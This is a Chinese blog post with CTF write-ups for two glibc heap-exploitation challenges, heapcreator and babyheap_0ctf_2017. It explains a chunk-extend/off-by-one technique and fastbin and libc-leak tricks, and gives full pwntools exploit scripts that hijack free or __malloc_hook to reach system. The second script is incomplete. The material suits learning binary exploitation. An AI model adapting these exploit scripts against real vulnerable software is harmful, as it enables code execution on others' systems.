(Chunk Extend,double_free)hitcontraining_heapcreator,babyheap_0ctf_2017

已于 2022-06-29 21:38:53 修改
阅读量165 收藏
点赞数 1
分类专栏: buu刷题记录 文章标签: 大数据
于 2022-06-29 21:37:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61283545/article/details/125529460
版权

复现hitcontraining_heapcreator

这道题,触及到了一个新知识Chunk Extend具体文章可以参考

好好说话之Chunk Extend/Overlapping_hollk的博客-CSDN博客 tql

审核代码的时候我们可以分析出大概题目申请堆块是,先申请一个计数堆块之后计数对快的指针会指向一个大小我们规定的内容堆块。

正常浏览后发现了在edit函数下有一个off by null漏洞,就是多溢出一个字节read_input(heaparray[idx]->content,heaparray[idx]->size+1);

为什么要用到chunk extend让我苦恼了很久,大概可以总结为一方面只能溢出一个字节我们就会想去常规的伪造堆块,可是伪造时候需要对齐,但是我们又只能控制一个字节,于是我们第一个堆的内容堆块大小才申请为0x10+8的形式,这样第二个堆块的pre_size我们就可以填满,进而控制第二堆的计数堆块的大小来伪造,可是这个时候却违反题目堆块的布置形式,这样子的话我们才必须用chunk extend来扩展,使得我们的第二个堆块被free后重新alloc布置,另一方面由于这道题并没有后门函数,就需要泄露libc,这又把我疑惑住了,思考了很久发现因为我们巧妙的chunk extend设计我们可以恰好覆盖到第二个堆块的计数堆块的指向内容对快的指针,我们直接覆盖再次打印时就会打印我们想泄露的libc地址

不知道为什么我本地时候函数地址有偏移,但是远程打通的时候却不用

from pwn import *


#p = remote('node4.buuoj.cn',29317)
p= process("./heapcreator")
elf = ELF("./heapcreator")
libc = ELF("uban.16.64")
context.log_level='debug'

log.success("free---->"+hex(elf.got['free']))

def add(size,content):
    p.sendlineafter("choice :",'1')
    p.sendlineafter("Heap : ",str(size))
    p.sendlineafter("heap:",content)

def edit(idx,content):
    p.sendlineafter("choice :",'2')
    p.sendlineafter("Index :",str(idx))
    p.sendlineafter("heap : ",content)

def show(idx):
    p.sendlineafter("choice :",'3')
    p.sendlineafter("Index :",str(idx))

def delete(idx):
    p.sendlineafter("choice :",'4')
    p.sendlineafter("Index :",str(idx))


add(24,'aaaa')
add(16,'bbbb')
add(16,"cccc")
edit(0,"/bin/sh\x00"+p64(0)*2+"\x41")

delete(1)

libc = ELF("uban.16.64")
elf = ELF("./heapcreator")
#add(48,'d'*16)
add(48,p64(0) * 3 + p64(0x21) + p64(0x30) + p64(elf.got['free']))
show(1)

#gdb.attach(p)
free_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
log.success("free----->"+hex(free_addr))

libc_base=free_addr-libc.symbols["free"]+0xa80
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']-16



log.success("system_addr: "+hex(system_addr))
edit(1,p64(system_addr))

delete(0)
gdb.attach(p)
p.interactive()

复现babyheap_0ctf_2017

详情参考无意间看到的通神博客babyheap_0ctf_2017 - 简书

这道题首先来说print函数中没有指针类型的目标同时也没有后面函数,留下的方法我目前已知便只有当申请smallbin时且只存在一块时,free掉时指向top_chunk => main_arena+0x58处,利用同事malloc——hook又在main_arena的上0x10处,这便是我们的目标修改malloc——hook,找到地址!

这道题的奇异点在于edit可以任意修改堆块大小,这很明显就可以伪造堆块,大方向就是伪造一个堆块包括一个满足small bin大小的堆,之后就free掉这个堆就可以得到地址。

具体的话就调试吧,值得注意的当我们free的时候我们要再申请一个堆块防止合并,为了满足大小位置堆块时,我们最后一个标记位置的堆块应该与我们申请的第一个堆块一样的这样保证循环

from pwn import *

p = process("./babyheap")
#p=remote("node4.buuoj.cn",25311)

context.log_level = 'debug'
def allo(size):
    p.recvuntil("Command: ")
    p.sendline(str(1))
    p.recvuntil("Size: ")
    p.sendline(str(size))

def fill(idx,content):
    p.recvuntil("Command: ")
    p.sendline(str(2))
    p.recvuntil("Index: ")
    p.sendline(str(idx))
    p.sendline(str(len(content)))
    p.recvuntil("Content: ")
    p.sendline(content)

def free(idx):
    p.recvuntil("Command: ")
    p.sendline(str(3))
    p.recvuntil("Index: ")
    p.sendline(str(idx))

def dump(idx):
    p.recvuntil("Command: ")
    p.sendline(str(4))
    p.recvuntil("Index: ")
    p.sendline(str(idx))


allo(0x60)
allo(0x40)
allo(0x100)


fill(0,'a'*0x60+p64(0)+p64(0x71))
fill(2,'b'*0x10+p64(0)+p64(0x71))
free(1)

allo(0x60)

fill(1,'c'*0x40+p64(0)+p64(0x111))
allo(0x100)
free(2)
dump(1)

libc=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print"libc-->"+hex(libc)
libc_base=libc-0x3c3b78
print"libc_base-->"+hex(libc_base)

libc=ELF("libc-2.23.so")
#libc=ELF("/lib64/ld-linux-x86-64.so.2")
#malloc = libc.symbols["__malloc_hook"]+libc_base


malloc_chunk = libc.symbols["__malloc_hook"]+libc_base
fake_chunk = malloc_chunk-0x23
print hex(fake_chunk)
free(1)
fill(0,"a"*0x60+p64(0)+p64(0x71)+p64(0x7f85548deafd)+p64(0))
allo(0x60)
allo(0x60)


gdb.attach(p)

osahha
关注
专栏目录
Chunk Extend and Overlapping学习
zyxx_wjc的博客
04-08 618
最近打算把堆利用的知识巩固一下,复习大纲依托于CTFwiki。对上面的知识和内容稍作了整理,也方便复习。 Chunk Extend and Overlapping,即让堆块大小拓展,以实现堆块重叠,便于下一步的利用。这一手法的基本原理是这两个宏: /* Get size, ignoring use bits */ #define chunksize(p) (chunksize_nomask(p) & ~(SIZE_BITS)) /* Like chunksize, but do not ma
(off by one+uaf+house of spirit)Asis CTF 2016 b00ks+hacknote+ZJctf—easyheap
weixin_61283545的博客
06-19 170
这道题的溢出点在这里,break的判断的条件是=,从0开始如果循环次数没有减一那就会溢出,明显在输入作者名是会溢出经过程序的执行很清楚的可以看出,作者名和图书的连在一起就会是图书的第一位溢出。可以看到在图书指针的地位由于溢出多了变0了,于是我们便去寻找0x0000555555757700可以指向谁(我们这里是直接假设name为128,des为32),可以看到第一本书的des就正好为我们改变指针的位置,意味着可以修改第一本书 的des为任意内容,下面的步骤就是扩展mmap后写入第二本书的name和des,在伪
(补题)LCTF2018 PWN easy_heap超详细讲解
hollk’s blog
02-08 2465
这道题是wiki上tcache attack 的Challenge 1,题目需要自己找一下。尝试上传到CSDN上,但总是提示已有,不知道是什么情况。这道题总的来说比较复杂,涉及到的知识点有:tcache分配、unsorted bin分配、堆块合并分割、tcache检查、hook。吐槽一点,堆块的id为什么非得从0开始啊!啊!啊!啊!总的来说收获满满,对tcache这类的题目理解更加深刻了(*^▽^*)
(补题)HITCON 2018 PWN baby_tcache超详细讲解
hollk’s blog
05-19 1767
好久没有更新了,这道题利用的是IO_FILE输出的方式进行泄露libc地址,需要结合着上一篇[好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc]一起来看,最近参加了安网杯,其中的pwn题也是利用IO_FILE进行输出的题,很幸运获得的第二名的成绩,大佬带飞~ 得抓紧把好好说话系列写完啦~
linux_pwn(3)--Chunk Extend and Overlapping&&roarctf_2019_easy_pwn
azraelxuemo的博客
03-07 3618
文章目录What is Chunk Extend and Overlappingpwn题思路例题保护机制add函数show函数delete函数edit函数开始做题准备框架调试覆盖后面一个块的大小释放堆块free验证机制尝试修改堆块开始泄露libc任意地址写总结 What is Chunk Extend and Overlapping Chunk Extend and Overlapping就是当我们可以控制chunk的header时候,通过修改原有块的头大小,产生堆块重叠 比如说原来的两个堆块都是0x21
0ctf-2018 heapstorm2详解
极目楚天舒的博客
05-20 2193
0x01 预备知识堆相关的数据结构通过malloc得到的我们称之为chunk,每一个chunk都有一个chunk头用于管理称之为malloc_chunk,定义如下:/* This struct declaration is misleading (but accurate and necessary). It declares a "view" into memory allowing a...
CTF-PWN-kernel-堆(UAF heap_overflow freelist劫持 offbynull arbitary_heap_free unlink page_level )
llovewuzhengzi的博客
08-26 325
文章目录参考Use After Free绑核cred_jar 可合并expcred_jar 不可合并利用 tty_struct 劫持程序控制流提权expHeap Overflow排布溢出修改 credexp堆溢出 + 堆喷射覆写 seq_operations 控制内核执行流expArbitrary Address Allocation(freelist 劫持)modprobe_path提权利用expOff By Null调试漏洞利用poll初始化喷poll_list和user_key_payload喷seq
CTF pwn题堆入门 -- Fast bin
lifanxin的博客
04-07 2506
这里写目录标题概述攻击方式实现任意地址分配fast bin poisoninghouse of spirit总结 概述   Fast bin是堆利用中最常遇见的情况,常见于libc2.23版本的pwn题中,在那个版本中还没有Tcache机制,在那个版本中漏洞利用还很轻松(????)。   这里简单总结一下fast bin的性质,64位机器下fast bin大小为0x20 – 0x80字节,每个bin链表之间以0x10字节递增;32位机器下为0x10 – 0x40,每个bin链表之间以0x8字节递增(上面的大
好好说话之House Of Einherjar
hollk’s blog
06-10 1512
又鸽了好久,抱歉哈~ 总的来说House Of Einherjar这种利用方法还是挺简单的,有点像chunk extend/shrink技术,只不过该技术是后向,并且利用top_chunk合并机制,个人觉得杀伤力比较强大
BUUCTF-babyheap_0ctf_2017
Rt1Text的博客
11-27 600
标准堆菜单。
DS_Store文件泄漏利用python脚本
06-22
在Bugku CTF(网络安全竞赛)中,.DS_Store文件的泄漏可能会成为攻击者获取关键信息的途径。攻击者可以利用这些泄漏的.DS_Store文件来推断用户的工作环境、访问过的文件或网络资源,甚至可能找到敏感数据的存放位置...
fastchat中出现TypeError: dumps_kwargs keyword arguments are no longer supported.的解决方案
热门推荐
weixin_43178406的博客
05-01 7万+
本文主要介绍了fastchat中出现TypeError: dumps_kwargs keyword arguments are no longer supported.解决方案,需要特别说明的是本方法不需要降级pydabtic的版本,希望能对使用fastchat的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
glibc __libc_free() 源码分析
huzai9527的博客
01-20 1123
__libc_free() 检查是否存在 hook函数,如果有就执行 void __libc_free (void *mem) { mstate ar_ptr; mchunkptr p; /* chunk corresponding to mem */ void (*hook) (void *, const void *) = atomic_forced_read (__free_hook); if (__builtin_exp
【零基础小白】 window环境下安装RabbitMQ
最新发布
许苑向上
11-06 234
RabbitMQ是用编写的,因此在安装RabbitMQ之前,需要先安装Erlang环境。确定Erlang版本:根据具体需求以及安装符合的Erlang版本。本文下载的故而下载Erlang版本之间的,打开系统属性:右键点击“此电脑”或“计算机”图标,选择“属性”,然后点击“高级系统设置”。编辑环境变量:在“系统属性”窗口中,点击“环境变量”按钮。编辑Path变量:同样在“系统变量”区域,找到名为Path的变量并选择它,然后点击“编辑”按钮。
数据治理项目怎么做,3种推进思路可参考
esensoft123的博客
11-06 489
因此,即使有些人认为先建大数据平台而暂时无法实现业务支撑或应用分析是无效的,但实际上,在建设平台的过程中,企业的能力已经在逐步提升。因此,在做项目时,我们必须与最终用户达成一致,明确项目的定义和规划。先做数据治理顶层设计的规划,确定战略目标,进而拆解KPI,然后设立对应的支撑项目,并且根据优先级别进行排序,最后形成一个执行的路径,即每个阶段要建设的项目及其目标。这种方式的优点显而易见:它确保了项目有明确的规划和方向,从面到线,再到点,逐步落实,从而最大程度地保证了项目的成功,减少了无用功和重复建设。
牛客网项目总结
qq_43539664的博客
11-04 280
下面这幅图是牛客网项目的架构图,最下层是Spring Boot,表示我们所有的技术都是基于Spring Boot,上面一层是Spring,Spring上面是Spring MVC、Spring MyBatis 和 Spring Security。数据库访问的问题,通过Spring Security来管理我们项目中的安全层面的这个内容来管理我们项目中的权限,这三个技术都是基于Spring之上的。由Spring进行整合。通过Spring MVC 解决前后端请求交互的问题,通过Spring MyBatis解决。
RDD转换算子:【filter】
一个大数据的爱好者
11-04 226
RDD转换算子:filter的用法
大数据新视界 -- 大数据大厂之 Impala 性能优化:解锁大数据分析的速度密码(上)(1/30)
【青云交】荣登原力全国前三,作者周榜前四,苏州均榜首,全网领军人物前列。
11-03 1038
本文围绕 Impala 性能优化展开,阐述其对大数据分析效率和企业决策的关键意义,剖析数据规模与复杂度、查询优化等挑战。介绍数据存储(分区、压缩)和查询(索引、语句重塑)优化策略,并通过电商和金融案例展示效果。对比 Impala 与 Hive、Spark SQL 的优劣,强调 Impala 在 OLAP 查询的优势。还介绍了可视化工具对优化的助力。鼓励读者分享 Impala 使用中的优化经验,同时预告下一篇将深入探讨数据存储分区相关内容。
高校大数据实训平台介绍
tipdm0301的博客
11-04 418
为满足高校专业教学要求和专业发展需求,泰迪智能科技结合自身技术优势,为院校提供实验室建设服务,充分发挥校企双方资源和技术优势,助力高校培养更多具有创新精神、科研精神及实践能力强的复合型人才。
GLB_CHUNK_LENGTH_UNALIGNED
05-30
GLB_CHUNK_LENGTH_UNALIGNED 是一个常量,其值为 1。在 GLib 库中,GLB_CHUNK_LENGTH_UNALIGNED 表示是否按照对齐长度分配内存块。如果设置为 1,则不按照对齐长度分配内存块,而是按照实际需要的长度分配内存块。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值